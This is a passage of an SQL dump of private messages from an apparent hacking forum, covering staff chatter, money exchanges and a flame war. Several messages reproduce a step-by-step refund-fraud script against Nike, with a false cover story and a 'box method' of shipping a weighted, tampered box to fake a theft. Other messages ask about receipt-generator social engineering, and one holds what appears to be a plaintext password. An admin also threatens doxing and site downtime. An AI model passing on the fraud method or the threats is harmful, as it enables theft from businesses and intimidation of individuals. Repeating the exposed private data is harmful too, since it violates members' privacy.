'[quote=\'Jacob\'] Can I talk to you on skype or aim for a sec? [/quote] sure, xwoogiex is my skype.', '1346628923', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1206', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Thread Design', '0', 'Hello I wrote an e-book and i want to sell it. But to make it look professional i need a good thread design. I already have a template of one but I do not know how to edit the psd files. I do not have photoshop and i do not want to download it. So i need to know how to edit the psd files without photoshop. Im not such a graphic type.. I saw lots of your graphics and I was very impressed :D So you probobally know how to make/edit psd files. thanks and regards', '1346695820', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1210', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Thread Design', '0', '[quote=\'iTzIpod\'] [quote=\'sirchamp\'] Hello I wrote an e-book and i want to sell it. But to make it look professional i need a good thread design. I already have a template of one but I do not know how to edit the psd files. I do not have photoshop and i do not want to download it. So i need to know how to edit the psd files without photoshop. Im not such a graphic type.. I saw lots of your graphics and I was very impressed :D So you probobally know how to make/edit psd files. thanks and regards [/quote] Can you upload the .PSD file to Mediafire or something and give the the link? I will replace the words with what you want. [/quote] I wont upload it quite yet because im not finished with the ebook yet. I will pm you again when I am ready this could take another week or something so dont wait.. Thanks a lot', '1346696823', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1239', '166', '1', '166', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Curious', '0', 'How does one SE on amazon using the receipt generator? ', '1346728078', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1245', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: :3', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] Make a leaking section. Someplace where I can put ebooks and stuff. [/quote] Can\'t because then we will have more leeched content and less content in tutorials etc sections. Why not put in under the hacking tab? Also need to make your access account. [/quote] Poopipie sosecret32', '1346764057', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1250', '53', '84', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"84\";}}', '2', 'Hello', '0', 'I do not know how to exchange paypal money to Liberty reserve can you tell me how? Thanks', '1346768591', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1253', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Exchange', '0', '[quote=\'t3h jok3r\'] It\'s allowed. [/quote] Ah good xD', '1346772193', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1256', '150', '172', '150', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"172\";}}', '2', 'NC PTP', '0', 'Are you interested in the paid to post?', '1346774870', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1258', '172', '150', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"150\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MinecraftGeek\'] Are you interested in the paid to post? [/quote] On NerdChat? well im not so active poster any more :( How much is the payout maximum?', '1346775195', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1260', '150', '172', '150', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"172\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MistaCode\'] [quote=\'MinecraftGeek\'] Are you interested in the paid to post? [/quote] On NerdChat? well im not so active poster any more :( How much is the payout maximum? [/quote] I have $20 for it to go on for a few days also the minimum payout is only 0.50 cents :)', '1346775230', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1262', '172', '150', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"150\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MinecraftGeek\'] [quote=\'MistaCode\'] [quote=\'MinecraftGeek\'] Are you interested in the paid to post? [/quote] On NerdChat? well im not so active poster any more :( How much is the payout maximum? [/quote] I have $20 for it to go on for a few days also the minimum payout is only 0.50 cents :) [/quote] Well lets see if i can get ;D', '1346775358', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1264', '172', '150', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"150\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MinecraftGeek\'] [quote=\'MistaCode\'] [quote=\'MinecraftGeek\'] Are you interested in the paid to post? [/quote] On NerdChat? well im not so active poster any more :( How much is the payout maximum? [/quote] I have $20 for it to go on for a few days also the minimum payout is only 0.50 cents :) [/quote] But yeah can y change my Username to MistaCode on NerdChat? Thanks ;)', '1346775509', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1266', '84', '53', '84', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Hello', '0', '[quote=\'sirchamp\'] I do not know how to exchange paypal money to Liberty reserve can you tell me how? Thanks [/quote] U can create thread on hf and exchange it', '1346776929', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1288', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Notepad', '0', '[quote=\'t3h jok3r\'] I updated your notepad with a Account Retrieval Guide. I also posted it on the ACP notepad. It has instructions on what to ask a member in order to hand over the account to them. [/quote] Notepad? What?', '1346797858', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1291', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] Yo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. [/quote] I am actually thinking of stepping down from Site Mod, I am very busy with school.', '1346798449', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1294', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Notepad', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] I updated your notepad with a Account Retrieval Guide. I also posted it on the ACP notepad. It has instructions on what to ask a member in order to hand over the account to them. [/quote] Notepad? What? [/quote] Usercp>Scroll right down. I wrote a method for you on how to retrieve accounts. Remember you are in-charge of stolen/hacked accounts? [/quote] And rep abuse and awards(if we get them back.', '1346815243', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1296', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'hello', '0', 'hey man, got any time free this week to teach me to SE. i added you on Skype btw. thanks', '1346815805', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1299', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] Yo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. [/quote] I am actually thinking of stepping down from Site Mod, I am very busy with school. [/quote] Are you sure? [/quote] Yeah sorry, I need to focus on school this year, I will be on everyday though. :)', '1346843873', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1301', '53', '84', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"84\";}}', '2', 'Exchange', '0', 'Hey Again I want to ask if you would like to make an exchange with me. You give me 50 cents on LR and i will give you up to 1 dollar on paypal. Write back if youre interested :D Regards', '1346859917', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1306', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Nike', '0', 'Nike Method, Please leave positive rep if this helped you. also let me know how you get on with this. How to Get a Free Pair of Nikes Step 1 =================================================================================== Okay, 1st of all you need to ring this number: 1300 65 64 53. Once you have gotten hold of someone, say the story below. \"Hi, my name is Michael, I recently purchased two pairs of [the nike shoes you want] for my children for passing there HSC exams. A pair of [any pair of nike shoes] for my son, and a pair [the nike shoes you want.] for my Daughter. My daughter is in a before school study session, so we had to rush her up to the school once she had gotten her present, so she didn\'t have a chance to open up the shoes.. My son is crazy about his, and has been showing them off to his mates all evening. Thankfully he is out there instead of in here. [A laugh here for good measure :) ] But my problem is that about 30 minutes ago my daughter gave me a call, and she is upset because 1 of the shoes are missing from the box. She is fairly fond of shoes so i know she wouldn\'t be joking. I told her to google your number so that I could ring you. So... i was wondering if I could get some help.\" Step 2 =================================================================================== Now they will ask for your email. After a couple of days they will send you out a box to put the shoes in for them to inspect them. This next trick is called the box method. The box method is getting a company to think that your item was stolen. To do the box method, (In this case you received a shipping label in your email) get a box. Tape the box shut, and put the shipping label a bit out of the way of the opening of the box. It needs to remain legible. Break into the box as if you are trying to steal whatever is inside. Now grab a weight of some sort, this can be a phonebook, rocks, etc. and stick them in the box. Now messily tape the box shut. Ship it out. Wait 3 days, since the shipping is a two day label. If you haven\'t received a call from Nike yet, call them and ask if you can check on the replacement. They will do a little investigation and say that the box was empty. At this point, they will either issue you a replacement, or they won’t. If they don\'t... FLIP THE FUCK OUT.', '1346863849', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1308', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', 'I would love too. My school isn\'t that bad anymore either. So ill be more active for sure.', '1346871566', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1310', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] Yo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. [/quote] I am actually thinking of stepping down from Site Mod, I am very busy with school. [/quote] Are you sure? [/quote] Yeah sorry, I need to focus on school this year, I will be on everyday though. :) [/quote] No problem, would you like to be a Mod or elite? [/quote] Doesn\'t matter, I will be on about every day also.', '1346874103', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1317', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] I would love too. My school isn\'t that bad anymore either. So ill be more active for sure. [/quote] Cool just give me one day to promote you and ask what JakeUS what\'s to become. He decided to step down because of his school. [/quote] Alright aha, Thanks for this.', '1346880677', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1336', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] I\'m promoted NXK to staff. Couldn\'t talk this out, reasons as follow. JakeUS said that he can\'t be staff anymore because of schools but he will be active but not active enough to handle reports in future. iTzIpod is 15- plus as he said that he will be busy with school and he lives outside of US so NXK was the only one left to promote and he even agreed. I can\'t make you a Staff lol. [/quote] Staff is better then admin? [/quote] No, why do you think that? [/quote] I was asking. :3 sorry and is iPod still going to be semi active?', '1346902611', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1339', '84', '53', '84', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Exchange', '0', '[quote=\'sirchamp\'] Hey Again I want to ask if you would like to make an exchange with me. You give me 50 cents on LR and i will give you up to 1 dollar on paypal. Write back if youre interested :D Regards [/quote] I dont have paypal', '1346950567', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1341', '53', '84', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"84\";}}', '2', 'Re: Exchange', '0', '[quote=\'Thunder™\'] [quote=\'sirchamp\'] Hey Again I want to ask if you would like to make an exchange with me. You give me 50 cents on LR and i will give you up to 1 dollar on paypal. Write back if youre interested :D Regards [/quote] I dont have paypal [/quote] Okay :( Im just filling out surveys on a website and then i get paid out on LR ;D', '1346956666', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1345', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Group', '0', 'Id like to make a gamers group. Since there\'s no section for it. I thought Id make a private group for it. That way people wont really see it. And we can have our own private forum. I think it would look better and keep posts more HQ. heres some userbars I made/came up with in class today >:) ahahahha http://imgur.com/a/dd02l', '1346962232', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1349', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Nike', '0', 'Nike Method, Please leave positive rep if this helped you. also let me know how you get on with this. How to Get a Free Pair of Nikes Step 1 ================================================================================?=== Okay, 1st of all you need to ring this number: 1300 65 64 53. Once you have gotten hold of someone, say the story below. \"Hi, my name is Michael, I recently purchased two pairs of [the nike shoes you want] for my children for passing there HSC exams. A pair of [any pair of nike shoes] for my son, and a pair [the nike shoes you want.] for my Daughter. My daughter is in a before school study session, so we had to rush her up to the school once she had gotten her present, so she didn\'t have a chance to open up the shoes.. My son is crazy about his, and has been showing them off to his mates all evening. Thankfully he is out there instead of in here. [A laugh here for good measure ] But my problem is that about 30 minutes ago my daughter gave me a call, and she is upset because 1 of the shoes are missing from the box. She is fairly fond of shoes so i know she wouldn\'t be joking. I told her to google your number so that I could ring you. So... i was wondering if I could get some help.\" Step 2 ================================================================================?=== Now they will ask for your email. After a couple of days they will send you out a box to put the shoes in for them to inspect them. This next trick is called the box method. The box method is getting a company to think that your item was stolen. To do the box method, (In this case you received a shipping label in your email) get a box. Tape the box shut, and put the shipping label a bit out of the way of the opening of the box. It needs to remain legible. Break into the box as if you are trying to steal whatever is inside. Now grab a weight of some sort, this can be a phonebook, rocks, etc. and stick them in the box. Now messily tape the box shut. Ship it out. Wait 3 days, since the shipping is a two day label. If you haven\'t received a call from Nike yet, call them and ask if you can check on the replacement. They will do a little investigation and say that the box was empty. At this point, they will either issue you a replacement, or they won’t. If they don\'t... FLIP THE FUCK OUT.', '1346963206', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1351', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'new group', '0', 'since you\'re going to be co leader for my group. http://l33thacking.net/showthread.php?tid=345&pid=1632#pid1632 Which one do you like?', '1346963672', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1355', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Nike', '0', '[quote=\'iTzIpod\'] [quote=\'??????Z\'] Nike Method, Please leave positive rep if this helped you. also let me know how you get on with this. How to Get a Free Pair of Nikes Step 1 ================================================================================?=== Okay, 1st of all you need to ring this number: 1300 65 64 53. Once you have gotten hold of someone, say the story below. \"Hi, my name is Michael, I recently purchased two pairs of [the nike shoes you want] for my children for passing there HSC exams. A pair of [any pair of nike shoes] for my son, and a pair [the nike shoes you want.] for my Daughter. My daughter is in a before school study session, so we had to rush her up to the school once she had gotten her present, so she didn\'t have a chance to open up the shoes.. My son is crazy about his, and has been showing them off to his mates all evening. Thankfully he is out there instead of in here. [A laugh here for good measure ] But my problem is that about 30 minutes ago my daughter gave me a call, and she is upset because 1 of the shoes are missing from the box. She is fairly fond of shoes so i know she wouldn\'t be joking. I told her to google your number so that I could ring you. So... i was wondering if I could get some help.\" Step 2 ================================================================================?=== Now they will ask for your email. After a couple of days they will send you out a box to put the shoes in for them to inspect them. This next trick is called the box method. The box method is getting a company to think that your item was stolen. To do the box method, (In this case you received a shipping label in your email) get a box. Tape the box shut, and put the shipping label a bit out of the way of the opening of the box. It needs to remain legible. Break into the box as if you are trying to steal whatever is inside. Now grab a weight of some sort, this can be a phonebook, rocks, etc. and stick them in the box. Now messily tape the box shut. Ship it out. Wait 3 days, since the shipping is a two day label. If you haven\'t received a call from Nike yet, call them and ask if you can check on the replacement. They will do a little investigation and say that the box was empty. At this point, they will either issue you a replacement, or they won’t. If they don\'t... FLIP THE FUCK OUT. [/quote] I\'ve seen this method already :/ Didn\'t work out [/quote] ah bad look, i know its worked for a few people but not everyone.', '1346963879', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1361', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: new group', '0', 'That\'s what I wanted to do, But i\'m not amazing at photoshop. I need to get my brother to help me aha.', '1346963934', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1365', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Nike', '0', 'yeah would have been nice. it doesnt work where i live so i had to pay for my nike jordans ', '1346964031', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1367', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: new group', '0', '[quote=\'iTzIpod\'] [quote=\'NXK\'] That\'s what I wanted to do, But i\'m not amazing at photoshop. I need to get my brother to help me aha. [/quote] I don\'t know how to do that :p [/quote] I\'m going to work on it now.', '1346964178', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1376', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Warning', '0', 'http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro', '1346966442', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1378', '178', '2', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Warning', '0', 'http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro', '1346966489', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1383', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] [quote=\'The Host\'] http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro [/quote] Fuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community. I have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. [/quote] Silly HF skid, my dox is public and always has been, I even updated it for everybody. This site is just HF clone #23645 You\'re not the first idiot to think he runs the place and you definitely won\'t be the last. ~Hostpro', '1346966787', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1386', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro [/quote] Fuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community. I have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. [/quote] Silly HF skid, my dox is public and always has been, I even updated it for everybody. This site is just HF clone #23645 You\'re not the first idiot to think he runs the place and you definitely won\'t be the last. ~Hostpro [/quote] Public? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. [/quote] You honestly make no sense, what have you reported my site for? The Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. ~Hostpro p.s I highly doubt you did anything anyway :roflol:', '1346967145', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1392', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro [/quote] 